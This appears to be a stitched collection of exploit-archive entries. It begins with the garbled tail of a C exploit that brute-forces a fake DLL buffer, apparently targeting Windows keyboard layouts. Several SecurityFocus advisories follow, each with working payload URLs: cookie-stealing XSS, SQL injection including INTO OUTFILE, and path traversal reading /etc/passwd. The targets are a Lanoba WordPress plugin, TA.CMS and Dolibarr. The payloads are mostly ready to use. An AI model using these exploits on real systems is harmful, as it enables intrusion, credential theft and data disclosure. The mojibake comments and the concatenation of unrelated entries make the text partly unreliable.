//ÎļþÒ»¶¨Òª·ÅÔÚsystem32Ŀ¼ÏÂÃ治Ȼ´¥·¢²»ÁË CloseHandle(hFile); //printf("\n[+] Done\n"); } int _tmain(int argc, _TCHAR* argv[]) { LoadLibraryA("user32.dll"); InitializeUnicodeStr(&uStr,L"p3d.dll");//ÏÖÔÚ±ØÐëСÓÚ³¤¶È //fix by instruder InitializeUnicodeStr(&uKerbordname,L"A"); uKerbordname.MaximumLength=0; for (int j=0;j<=2;j++) { for (int i1=0;i1<=0xff;i1++) { for (int i2=0;i2<0xff;i2++) { printf("%x,%x\n",i1,i2); fakeDll2[0x3d]=i1; fakeDll2[0x3e]=i2; fakeDll2[0x3f]=j; boom_loadlayout(); } } } return 0; }//

source: https://www.securityfocus.com/bid/50746/info Lanoba Social Plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Lanoba Social Plugin 1.0 is vulnerable; other versions may also be affected. UPDATE (Nov 28, 2011): The vendor refutes this issue claiming they are not able to replicate the problem, and all inputs are sanitized. This BID will be updated, and possibly retired pending further information. http://www.example.com/[path]/wp-content/plugins/lanoba-social-plugin/index.php?action=[xss]

source: https://www.securityfocus.com/bid/50773/info TA.CMS is prone to multiple local file-include and SQL-injection vulnerabilities. An attacker can exploit these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and view and execute arbitrary local files within the context of the webserver. http://www.example.com/index.php?p_name=events_item_view&id=17' SQL

source: https://www.securityfocus.com/bid/50773/info TA.CMS is prone to multiple local file-include and SQL-injection vulnerabilities. An attacker can exploit these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and view and execute arbitrary local files within the context of the webserver. http://www.example.com/?lang=../../../../../../../../../../../../../../../etc/passwd%00.png&p_id=60

source: https://www.securityfocus.com/bid/50777/info Dolibarr is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Dolibarr 3.1.0 RC is vulnerable; prior versions may also be affected. http://www.example.com/index.php/%22%3E%3Cimg%20src=1%20onerror=javascript:alert%28document.cookie%29%3E http://www.example.com/admin/boxes.php/%22%3E%3Cimg%20src=1%20onerror=javascript:alert%28document.cookie%29%3 E http://www.example.com/comm/clients.php/%22%3E%3Cimg%20src=1%20onerror=javascript:alert%28document.cookie%29% 3E http://www.example.com/commande/index.php/%22%3E%3Cimg%20src=1%20onerror=javascript:alert%28document.cookie%2 9%3E http://www.example.com/admin/ihm.php?optioncss=%22%3E%3Cimg%20src=1%20onerror=javascript:alert%28document.coo kie%29%3E http://www.example.com/user/home.php?optioncss=%22%3E%3Cimg%20src=1%20onerror=javascript:alert%28document.coo kie%29%3E Successful exploitation of this vulnerabilities requires that Apache&#039;s directive "AcceptPathInfo" is set to "on" or "default" (default value is "default")

source: https://www.securityfocus.com/bid/50777/info Dolibarr is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Dolibarr 3.1.0 RC is vulnerable; prior versions may also be affected. http://www.example.com/user/info.php?id=1 INTO OUTFILE &#039;../../../tmp/example&#039;